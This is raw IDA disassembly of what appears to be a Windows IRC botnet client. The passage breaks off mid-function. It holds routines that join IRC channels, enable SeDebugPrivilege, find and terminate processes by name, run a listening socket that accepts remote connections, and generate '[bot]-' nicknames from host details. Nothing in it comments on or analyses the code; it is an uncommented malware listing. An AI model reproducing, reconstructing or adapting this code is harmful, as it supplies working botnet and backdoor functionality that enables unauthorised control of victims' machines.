loc_4150C0: ; CODE XREF: sub_40EE72+6232�j
lea eax, [ebp+var_D8]
push eax
push offset dword_4351C4
jmp loc_40F422
; ---------------------------------------------------------------------------
loc_4150D1: ; CODE XREF: sub_40EE72+20E�j
; sub_40EE72+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push offset aXi ; "+xi"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
mov ds:dword_489DCC, edi
jmp loc_40F10F
sub_40EE72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41511D proc near ; CODE XREF: sub_409037+45�p
; sub_409037+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_42413C ; GetCurrentProcess
push eax
call ds:dword_43F64C ; OpenProcessToken
test eax, eax
jnz short loc_41513C
leave
retn
; ---------------------------------------------------------------------------
loc_41513C: ; CODE XREF: sub_41511D+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call ds:dword_43F624 ; LookupPrivilegeValueA
test eax, eax
jz short loc_41517A
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_415163
or [ebp+var_8], 2
jmp short loc_415167
; ---------------------------------------------------------------------------
loc_415163: ; CODE XREF: sub_41511D+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_415167: ; CODE XREF: sub_41511D+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call ds:dword_43F6D4 ; AdjustTokenPrivileges
mov esi, eax
loc_41517A: ; CODE XREF: sub_41511D+32�j
push [ebp+var_4]
call ds:off_424078
mov eax, esi
pop esi
leave
retn
sub_41511D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415188 proc near ; CODE XREF: sub_40EE72+4B66�p
; sub_415339+74�p
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp ds:dword_43F688, ebx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_415332
cmp ds:dword_43F66C, ebx
jz loc_415332
cmp ds:dword_43F588, ebx
jz loc_415332
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511D
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_43F688 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_415325
lea eax, [ebp+var_12C]
mov [ebp+var_12C], 128h
push eax
push [ebp+var_4]
call ds:dword_43F66C ; Process32First
mov esi, ds:off_424078
test eax, eax
jz loc_415320
loc_41522B: ; CODE XREF: sub_415188+BE�j
; sub_415188+CC�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call ds:dword_43F588 ; Process32Next
test eax, eax
jz loc_415320
cmp [ebp+arg_10], ebx
jnz short loc_41522B
cmp [ebp+arg_C], ebx
jnz loc_4152D8
cmp [ebp+arg_4], ebx
jz short loc_41522B
push [ebp+var_124]
push 8
call ds:dword_43F688 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], ebx
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_415295
lea eax, [ebp+var_350]
push eax
push edi
call ds:dword_43F534 ; Module32First
push [ebp+var_124]
test eax, eax
jz short loc_41529B
lea eax, [ebp+var_230]
jmp short loc_4152A1
; ---------------------------------------------------------------------------
loc_415295: ; CODE XREF: sub_415188+EB�j
push [ebp+var_124]
loc_41529B: ; CODE XREF: sub_415188+103�j
lea eax, [ebp+var_108]
loc_4152A1: ; CODE XREF: sub_415188+10B�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_4172AE
add esp, 10h
lea eax, [ebp+var_550]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
push edi
call esi ; sub_49C3D5
jmp loc_41522B
; ---------------------------------------------------------------------------
loc_4152D8: ; CODE XREF: sub_415188+C3�j
push [ebp+arg_C]
lea eax, [ebp+var_108]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_41522B
push [ebp+var_124]
push ebx
push 1F0FFFh
call ds:dword_4240FC ; OpenProcess
push [ebp+var_4]
mov edi, eax
call esi ; sub_49C3D5
push ebx
push edi
call ds:dword_424170 ; TerminateProcess
test eax, eax
jnz short loc_41531B
push edi
call esi ; sub_49C3D5
jmp short loc_415332
; ---------------------------------------------------------------------------
loc_41531B: ; CODE XREF: sub_415188+18C�j
push 1
pop eax
jmp short loc_415334
; ---------------------------------------------------------------------------
loc_415320: ; CODE XREF: sub_415188+9D�j
; sub_415188+B5�j
push [ebp+var_4]
call esi ; sub_49C3D5
loc_415325: ; CODE XREF: sub_415188+75�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511D
pop ecx
pop ecx
loc_415332: ; CODE XREF: sub_415188+3A�j
; sub_415188+46�j ...
xor eax, eax
loc_415334: ; CODE XREF: sub_415188+196�j
pop edi
pop esi
pop ebx
leave
retn
sub_415188 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415339 proc near ; DATA XREF: sub_40EE72+595A�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset unk_438838
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_4172AE
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_415398
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40D679
add esp, 14h
loc_415398: ; CODE XREF: sub_415339+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_415188
add esp, 18h
test eax, eax
jnz short loc_4153C0
push offset unk_438800
jmp short loc_4153C5
; ---------------------------------------------------------------------------
loc_4153C0: ; CODE XREF: sub_415339+7E�j
push offset unk_4387C8
loc_4153C5: ; CODE XREF: sub_415339+85�j
lea eax, [ebp+var_298]
push eax
call sub_4172AE
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_4153F8
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40D679
add esp, 14h
loc_4153F8: ; CODE XREF: sub_415339+9D�j
lea eax, [ebp+var_298]
push eax
call sub_40BF6D
push [ebp+var_14]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_415339 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415417 proc near ; CODE XREF: sub_40EE72+4B08�p
; sub_416E95+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_4240FC ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_415449
push 0
push esi
call ds:dword_424170 ; TerminateProcess
test eax, eax
jnz short loc_415449
push esi
xor edi, edi
call ds:off_424078
loc_415449: ; CODE XREF: sub_415417+1A�j
; sub_415417+27�j
mov eax, edi
pop edi
pop esi
retn
sub_415417 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41544E proc near ; CODE XREF: sub_4030D1+A�p
; _0:0040369E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_41730A
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_4246A0
call sub_417DC4
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_41544E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41547E proc near ; DATA XREF: sub_41570C+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_4450CC[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call ds:dword_43F650 ; select
test eax, eax
jnz short loc_415502
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_415502: ; CODE XREF: sub_41547E+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call ds:dword_43F680 ; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_415683
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_415683
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_415683
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call ds:dword_43F5C4 ; getpeername
test eax, eax
jz short loc_41557B
call ds:dword_43F5FC ; WSAGetLastError
push eax
push offset dword_43892C
call sub_40BFE1
push [ebp+arg_0]
call sub_417076
add esp, 0Ch
push edi
call ds:dword_424054 ; ExitThread
loc_41557B: ; CODE XREF: sub_41547E+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call ds:dword_43F620 ; gethostbyaddr
cmp eax, edi
jnz short loc_4155A5
push [ebp+var_18]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_4172AE
jmp short loc_4155B3
; ---------------------------------------------------------------------------
loc_4155A5: ; CODE XREF: sub_41547E+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_4179C0
loc_4155B3: ; CODE XREF: sub_41547E+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_43C80C
push dword ptr [esi]
call ds:dword_43F6B8 ; send
cmp ds:dword_489DDC, edi
jnz short loc_415615
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_4156DD
add esp, 10h
test eax, eax
jnz short loc_415615
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call ds:dword_43F6B8 ; send
push dword ptr [esi]
call ds:dword_43F700 ; closesocket
push [ebp+arg_0]
call sub_417076
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_415615: ; CODE XREF: sub_41547E+14C�j
; sub_41547E+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset dword_4388E0
call sub_40BFE1
push [ebp+arg_0]
call sub_4165C4
add esp, 10h
test eax, eax
jnz short loc_41565C
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_4388A4
call sub_40BFE1
push [ebp+arg_0]
call sub_417076
add esp, 0Ch
push ebx
call ds:dword_424054 ; ExitThread
loc_41565C: ; CODE XREF: sub_41547E+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset dword_43886C
call sub_40BFE1
push [ebp+arg_0]
call sub_417076
add esp, 10h
push edi
call ds:dword_424054 ; ExitThread
sub_41547E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415683 proc near ; CODE XREF: sub_41547E+9A�p
; sub_41547E+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_43F680 ; recv
cmp eax, 1
jnz short loc_4156D3
mov esi, [ebp+arg_4]
loc_4156A1: ; CODE XREF: sub_415683+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_4156C8
test al, al
jz short loc_4156D7
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_43F680 ; recv
cmp eax, 1
jz short loc_4156A1
jmp short loc_4156D3
; ---------------------------------------------------------------------------
loc_4156C8: ; CODE XREF: sub_415683+27�j
push offset dword_438968
call sub_40BFE1
pop ecx
loc_4156D3: ; CODE XREF: sub_415683+19�j
; sub_415683+43�j
xor eax, eax
jmp short loc_4156DA
; ---------------------------------------------------------------------------
loc_4156D7: ; CODE XREF: sub_415683+2B�j
push 1
pop eax
loc_4156DA: ; CODE XREF: sub_415683+52�j
pop esi
leave
retn
sub_415683 endp
; =============== S U B R O U T I N E =======================================
sub_4156DD proc near ; CODE XREF: sub_41547E+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_415708
push [esp+arg_4]
push [esp+4+arg_0]
push offset dword_4389A0
call sub_40BFE1
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_415708: ; CODE XREF: sub_4156DD+11�j
push 1
pop eax
retn
sub_4156DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41570C proc near ; DATA XREF: sub_40EE72+5621�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call ds:dword_43F5E0 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_415765
push eax
push offset dword_438B64
call sub_40BFE1
push [ebp+var_4C]
call sub_417076
add esp, 0Ch
push edi
call ds:dword_424054 ; ExitThread
loc_415765: ; CODE XREF: sub_41570C+3A�j
push edi
push offset loc_41598A
call ds:dword_424174 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_41579E
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_438B14
call sub_40BFE1
pop ecx
pop ecx
call ds:dword_43F5C8 ; WSACleanup
push [ebp+var_4C]
call sub_417076
pop ecx
push edi
call ds:dword_424054 ; ExitThread
loc_41579E: ; CODE XREF: sub_41570C+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call ds:dword_43F668 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call ds:dword_43F6E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_415915
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov ds:dword_4450CC[eax], ebx
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_43F694 ; bind
test eax, eax
jnz loc_415915
push 7FFFFFFFh
push ebx
call ds:dword_43F690 ; listen
test eax, eax
jnz loc_415915
push offset dword_438AC8
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_40BF6D
pop ecx
mov [ebp+arg_0], edi
loc_41582D: ; CODE XREF: sub_41570C+15A�j
; sub_41570C+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call ds:dword_43F6FC ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_415918
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call ds:dword_43F648 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_41582D
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset dword_438A74
push eax
call sub_4172AE
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
push edi
lea eax, [ebp+var_414]
push 6
push eax
call sub_416D5A
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov ds:dword_4450C4[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_41547E
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov ds:dword_4450D4[ecx], eax
jz short loc_415900
loc_4158ED: ; CODE XREF: sub_41570C+1F2�j
cmp [ebp+var_38], esi
jnz loc_41582D
push 32h
call ds:dword_424064 ; Sleep
jmp short loc_4158ED
; ---------------------------------------------------------------------------
loc_415900: ; CODE XREF: sub_41570C+1DF�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_438A28
call sub_40BFE1
pop ecx
pop ecx
jmp short loc_415918
; ---------------------------------------------------------------------------
loc_415915: ; CODE XREF: sub_41570C+C8�j
; sub_41570C+EC�j ...
mov edi, [ebp+arg_0]
loc_415918: ; CODE XREF: sub_41570C+13C�j
; sub_41570C+207�j
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset dword_4389E4
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_415958
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_40D679
add esp, 14h
loc_415958: ; CODE XREF: sub_41570C+22A�j
lea eax, [ebp+var_414]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43F700 ; closesocket
push ebx
call ds:dword_43F700 ; closesocket
call ds:dword_43F5C8 ; WSACleanup
push [ebp+var_4C]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop ebx
loc_41598A: ; DATA XREF: sub_41570C+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_41570C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415994 proc near ; CODE XREF: sub_415CFF+49�p
; DATA XREF: _2:off_438BB0�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aBot ; "[bot]-"
push offset aS_3 ; "%s"
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 10h
cmp ds:dword_42F5C8, esi
jle short loc_4159ED
loc_4159C7: ; CODE XREF: sub_415994+57�j
call sub_41730A
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_438C04
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_4159C7
loc_4159ED: ; CODE XREF: sub_415994+31�j
mov eax, edi
pop edi
pop esi
retn
sub_415994 endp
; =============== S U B R O U T I N E =======================================
sub_4159F2 proc near ; CODE XREF: sub_40EE72+3E7F�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
pop ecx
call sub_41730A
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, ds:dword_42F5C8
test esi, esi
jle short loc_415A35
loc_415A1F: ; CODE XREF: sub_4159F2+41�j
call sub_41730A
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_415A1F
loc_415A35: ; CODE XREF: sub_4159F2+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4159F2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_438C0C
push eax
push esi
call ds:dword_424154 ; GetComputerNameA
movsx eax, ds:byte_438C0C
push 41h
pop ecx
push 1
pop edx
loc_415A7B: ; CODE XREF: _0:00415A86�j
cmp eax, ecx
jnz short loc_415A82
mov [ebp-4], edx
loc_415A82: ; CODE XREF: _0:00415A7D�j
inc ecx
cmp ecx, 5Bh
jl short loc_415A7B
push 61h
pop ecx
loc_415A8B: ; CODE XREF: _0:00415A96�j
cmp eax, ecx
jnz short loc_415A92
mov [ebp-4], edx
loc_415A92: ; CODE XREF: _0:00415A8D�j
inc ecx
cmp ecx, 7Bh
jl short loc_415A8B
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 0Ch
cmp ds:dword_42F5C8, esi
jle short loc_415AD7
loc_415AB1: ; CODE XREF: _0:00415AD5�j
call sub_41730A
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_438C04
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_415AB1
loc_415AD7: ; CODE XREF: _0:00415AAF�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_424178 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_438C10
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 10h
cmp ds:dword_42F5C8, esi
jle short loc_415B4C
loc_415B26: ; CODE XREF: _0:00415B4A�j
call sub_41730A
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_438C04
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_415B26
loc_415B4C: ; CODE XREF: _0:00415B24�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_43C80C
mov dword ptr [ebp-94h], 94h
call ds:dword_424144 ; GetVersionExA
call ds:dword_424058 ; GetTickCount
push eax
call sub_417300
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_415BD6
cmp dword ptr [ebp-8Ch], 0
jnz short loc_415BB6
cmp dword ptr [ebp-84h], 1
jnz short loc_415BA6
mov esi, offset a95 ; "95"
loc_415BA6: ; CODE XREF: _0:00415B9F�j
cmp dword ptr [ebp-84h], 2
jnz short loc_415C12
mov esi, offset aNt ; "NT"
jmp short loc_415C12
; ---------------------------------------------------------------------------
loc_415BB6: ; CODE XREF: _0:00415B96�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_415BC6
mov esi, offset a98 ; "98"
jmp short loc_415C12
; ---------------------------------------------------------------------------
loc_415BC6: ; CODE XREF: _0:00415BBD�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_415C0D
mov esi, offset aMe ; "ME"
jmp short loc_415C12
; ---------------------------------------------------------------------------
loc_415BD6: ; CODE XREF: _0:00415B8D�j
cmp dword ptr [ebp-90h], 5
jnz short loc_415C0D
cmp dword ptr [ebp-8Ch], 0
jnz short loc_415BEF
mov esi, offset a2k ; "2K"
jmp short loc_415C12
; ---------------------------------------------------------------------------
loc_415BEF: ; CODE XREF: _0:00415BE6�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_415BFF
mov esi, offset aXp ; "XP"
jmp short loc_415C12
; ---------------------------------------------------------------------------
loc_415BFF: ; CODE XREF: _0:00415BF6�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_438C1C
jz short loc_415C12
loc_415C0D: ; CODE XREF: _0:00415BCD�j _0:00415BDD�j
mov esi, offset dword_42DDDC
loc_415C12: ; CODE XREF: _0:00415BAD�j _0:00415BB4�j ...
mov edi, [ebp+8]
push esi
push offset dword_438C14
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 10h
cmp ds:dword_42F5C8, esi
jle short loc_415C56
loc_415C30: ; CODE XREF: _0:00415C54�j
call sub_41730A
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_438C04
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_415C30
loc_415C56: ; CODE XREF: _0:00415C2E�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C5C proc near ; CODE XREF: sub_415CFF+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_424058 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_415CAB
call ds:dword_43F674 ; FindWindowA
test eax, eax
mov eax, offset dword_438C28
jnz short loc_415C94
mov eax, offset byte_43C80C
loc_415C94: ; CODE XREF: sub_415C5C+31�j
push eax
push esi
push offset dword_438C20
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41782A
add esp, 14h
jmp short loc_415CCB
; ---------------------------------------------------------------------------
loc_415CAB: ; CODE XREF: sub_415C5C+22�j
call ds:dword_43F674 ; FindWindowA
test eax, eax
mov eax, offset dword_438C28
jnz short loc_415CBF
mov eax, offset byte_43C80C
loc_415CBF: ; CODE XREF: sub_415C5C+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_415CCB: ; CODE XREF: sub_415C5C+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_417AB0
pop ecx
cmp eax, 2
pop esi
jbe short loc_415CFA
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_418DE0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_418C10
add esp, 18h
loc_415CFA: ; CODE XREF: sub_415C5C+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_415C5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415CFF proc near ; CODE XREF: sub_40EB92+7F�p
; sub_40ECFA+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_438BAC
loc_415D0B: ; CODE XREF: sub_415CFF+3F�j
cmp [ebp+arg_C], 0
jz short loc_415D26
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_4176D0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_415D30
